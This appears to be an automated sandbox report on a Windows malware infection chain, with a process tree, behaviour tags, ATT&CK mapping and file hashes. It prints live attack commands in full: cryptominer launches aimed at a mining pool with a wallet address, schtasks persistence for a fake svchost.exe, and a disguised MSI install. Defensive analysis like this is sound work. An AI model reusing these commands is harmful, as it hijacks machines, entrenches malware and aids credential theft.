C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:26⤵PID:3140
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:2508 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:86⤵PID:3144
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:16⤵PID:3588
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:16⤵PID:1996
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:16⤵PID:5156
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,2302900478206122642,18244926129961902515,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2280 /prefetch:26⤵
- Suspicious behavior: EnumeratesProcesses
PID:7108 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"5⤵
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account6⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cc262b5e-d8fa-469d-8120-04b015cdf2f1} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" gpu7⤵PID:4940
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2452 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50accd5e-44cf-4785-8112-a5dbe28bf6b0} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" socket7⤵PID:3368
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3032 -childID 1 -isForBrowser -prefsHandle 3296 -prefMapHandle 3328 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {94f8cef6-2f7c-4281-9f62-761d6a50fb73} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab7⤵PID:1840
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3788 -childID 2 -isForBrowser -prefsHandle 3208 -prefMapHandle 3004 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {788e0a73-7cb4-4bba-acf5-ce847c58a6ab} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab7⤵PID:5264
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2788 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4496 -prefMapHandle 4492 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f29bb8c9-085f-4c4c-9336-b973f0ce890b} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" utility7⤵
- Checks processor information in registry
PID:6048 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5192 -childID 3 -isForBrowser -prefsHandle 5184 -prefMapHandle 5180 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {97ef6b81-28b2-4565-ad55-2c2f46a448e0} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab7⤵PID:5748
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5432 -childID 4 -isForBrowser -prefsHandle 5424 -prefMapHandle 5420 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {323e5b80-a7b3-4a95-81ba-1cb9ddb4c4f7} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab7⤵PID:5800
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5656 -childID 5 -isForBrowser -prefsHandle 5648 -prefMapHandle 5548 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0e1585f-5c7f-4cf2-825c-2992fa7afdf4} 5064 "\\.\pipe\gecko-crash-server-pipe.5064" tab7⤵PID:5848
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"3⤵PID:5380
-
C:\Users\Admin\1000029002\84743dcfde.exe"C:\Users\Admin\1000029002\84743dcfde.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6056 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 11004⤵
- Program crash
PID:6284 -
C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe"C:\Users\Admin\AppData\Local\Temp\1000030001\c5d6d3a173.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5680 -
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6328 -
C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe"C:\Users\Admin\AppData\Local\Temp\1000057001\jsawdtyjde.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:6696 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "6⤵PID:6804
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\clamer.execlamer.exe -priverdD7⤵
- Checks computer location settings
- Executes dropped EXE
PID:6884 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\thkdh.exe"8⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:7080 -
C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe"C:\Users\Admin\AppData\Local\Temp\1000058001\deepweb.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6980 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7128 -
C:\Users\Admin\AppData\Local\Temp\pureee.exe"C:\Users\Admin\AppData\Local\Temp\pureee.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:6712 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:2296
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:7468
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:6824
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:7344
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:7156
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:7668
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:7888
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:8148
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:6832
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:2112
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:1156
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:7432
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:3296
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=508⤵PID:7072
-
C:\Users\Admin\AppData\Local\Temp\adada.exe"C:\Users\Admin\AppData\Local\Temp\adada.exe"7⤵
- Executes dropped EXE
PID:5072 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:3308 -
C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe"8⤵
- Executes dropped EXE
PID:7036 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:7252 -
C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:4048 -
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"8⤵
- Blocklisted process makes network request
- Enumerates connected drives
PID:5684
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1712
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2084
-
C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"1⤵PID:5576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6056 -ip 60561⤵PID:6220
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6176
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exeC:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:664
-
C:\ProgramData\xpmvhsd\agpphek.exeC:\ProgramData\xpmvhsd\agpphek.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:7024
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7916
-
C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exeC:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:7920
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Adds Run key to start application
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:6644 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 14DACB80DBDFC332DF65DB0A9EFEEEAC2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:6920 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding CB04F01786E3B7FD6C6ED8BD6F4FAFDD E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:7824 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exe" /C "cd "C:\Program Files (x86)\COMODO\Endpoint Manager\" && "C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe" "3⤵
- System Location Discovery: System Language Discovery
PID:7728 -
C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe"C:\Program Files (x86)\COMODO\Endpoint Manager\python_x86_Lib.exe"4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:8188 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "5⤵
- System Location Discovery: System Language Discovery
PID:6764
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:7576
-
C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMService.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:6896 -
C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:7240 -
C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe" noui2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2380 -
C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe"C:\Program Files (x86)\COMODO\Endpoint Manager\ITSMAgent.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4080
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
710KB
MD59f72d982c0d6471e57ca44c295ea8b33
SHA12fb67ef35c005949d7cb9c6dc98ae961428bff70
SHA2567f479884281ffd1ba4e380beed45f966902b6c4f36dd2c687f896526be629509
SHA512bb9f72d7d3f6132240c2567f078c346a55719bb61e01baceb31ff1d333fdddbc2ad0d6d4e01ba85ed5becc7bba2b64a5106da882c5ede75a138516c00e386780
-
Filesize
3.0MB
MD5a5b010d5b518932fd78fcfb0cb0c7aeb
SHA1957fd0c136c9405aa984231a1ab1b59c9b1e904f
SHA2565a137bfe1f0e6fc8a7b6957d5e9f10df997c485e0869586706b566015ff36763
SHA512e0ca4b29f01f644ef64669ed5595965b853ae9eaa7c6c7d86df7634437041ef15ceb3c2d1ab9dec4171c80511684a7d7b06fc87b658e5a646699eb9523bc4994
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
2.5MB
MD5b0ba860b42be7fd7f182a8b2ec6edb87
SHA1889f4e40928407f1fe58aeb39179fd338837bc3b
SHA25632016b9fa4a40791faeedf08a7e6944bbe3bf22767d34eb76cc10efc61362eae
SHA512ba3cfaa6053a7bd99aa547eaf80a43b2155960e3a4613ed24e02b46efd1b9645ba9527b8abd1b5ec8a3473cdb2366e09df40b08b868f24a22d56f04b4b69133c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\18E6B4A57A6BC7EC9B861CDF2D6D0D02_EF52C1EC85F21F31CC0157A5C8803013
Filesize765B
MD5f1382455206b34aa38e2d8dd182fb525
SHA11a6a03acfd3dc66eae8e8d4ca47d07cda5cabf60
SHA25618d04aad7e1875b8c0e8a77ced64abfa907a2cfe4d37d4ae79f25d1731bbd8e5
SHA512edd7e0b5164be4df5c87b11e1e2bc8021bc1ba44cce39c828b6cd07fb1454772a1a8a1ed35c0068f4259ff62d1347344d3dc292b8b8470c50b38f18a35d29036
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3AA0DCD5A74331FBD6F344550EC48B87_D7025277F003EE88ED342C67F3525784
Filesize637B
MD5720c16d391ef70c6fe4742de4f2dae76
SHA189e1e7bcdbb8befea64211884e91f3f1d5ec3ade
SHA2568d862f89114cdae890efecef58c12e3b46eaca6ffe9076c0bf35e70fe23110ce
SHA512a5ab9f919af951d0fd05ae88188ec344ceb451e7568e1ebe8865482aeeeb7b94790b807250fc768dc5ab734c58794eae4a476edf64826c0b446a27f06e91ac76
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F
Filesize1KB
MD5c1657c09cbf653085fe5977265c03e1d
SHA1304d2bd99d40aa426d2620893045e7c8805f3906
SHA2563e9b4e775c00a2fd2b1db9d5c7b4e83d6df7f3683aaba7283a8137248dad751a
SHA51273cb77912b1482f76e4b5a091dac1f83401673f64973e458ab0a8184aba41f3c0560950c26941ea952a02cf2cde9722de726313a8820fd5daa07e06c97344f4a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\18E6B4A57A6BC7EC9B861CDF2D6D0D02_EF52C1EC85F21F31CC0157A5C8803013
Filesize484B
MD59ce95ea5537dc444623915e41d01834e
SHA1c207883d1775ff9fe9c3e6b2c0ba6553c9d2567b
SHA25675eccd68c71482d3a0f90dd9d667c73fb71e227f10493bbc571c34ad454e314a
SHA512807109435fd6ae9152f0b699fbe30f6e219511de7b625a6a8eac63b9a5f59d098caed85eaec8aeeafd9160db4aaf4fd17e6a4606ea7e571d62ab00320a297dfa
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3AA0DCD5A74331FBD6F344550EC48B87_D7025277F003EE88ED342C67F3525784
Filesize480B
MD526e7cb37732b98d7c29ea97da4de1978
SHA106e1ce413cf84e87e466146dc1cb30966db86f13
SHA256187a76b0181a4dafa61a30fb9f8ea54612b911c9f2796dde80004f24f9d18254
SHA5122e956d7dbaaeef5615497d46caabda7ee328eef206c0df7dd570a0e058eca7d8f2ec744462d839ff19be1d5cb072081c340e641cbc3e837a011f770ea6d98d3c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_93702E680A5530C052C8D2BA33A2225F
Filesize482B
MD5a64c57cc2af06e31bdb3e3e1e9bc75ae
SHA1020eedf9ce743d862584591385814e2030d930d3
SHA2561806293e8318aa0b5580a41197f4877a915c9d1697e9af0dc4988e67bf500365
SHA512524e5c2fbd8494ce07ecf568715fa2ff91edc193033f280a0831d16279a2561dd8c4d046ec877c81f652a97c1abd12107b92c013d398516c9c501d7d3f64f13d
-
Filesize
264B
MD5e24832a085fef81922b42720c14e7f4a
SHA1a3c8e18706f35de41586df4e5f5df0d14bf00b0f
SHA25627108448cbb79a38e60a234fd9c04b8a69bcdf6e166cb476a1294121bac4cfcc
SHA5121f5792a5b2fab9c050eeef3ee6bc1ba048d30aea993cd4304052e11419cb20325f8821c396b79428959326c034ff41900d0576640773b92f1b90a2c9fd24f0ba
-
Filesize
3KB
MD574ac1f9f671912f41784c07fabd8879f
SHA1efc25cd54729a21825f125d4e1187b9138c70955
SHA2565d7d578dfa1a81235104ee1ecefb3f78a1695476d4ce4b5b9963082320549575
SHA51256146756b9c5056bbe7841410c92e957cb5f331bc27e03c9dc4f6f04cb77f19eae5d972e1725ea60db962c880e355225b342a20ef705ea9d91d51258c52f2311
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD5c1b25fb7b416cb4fd66887f26cbcb4c2
SHA1b7cebff50cf609159e8f2a2d274b96a8100a521d
SHA2561102c44df5ba5de712a1f8d54edbcdd0dcb0ae8041b7ba908db848600209612b
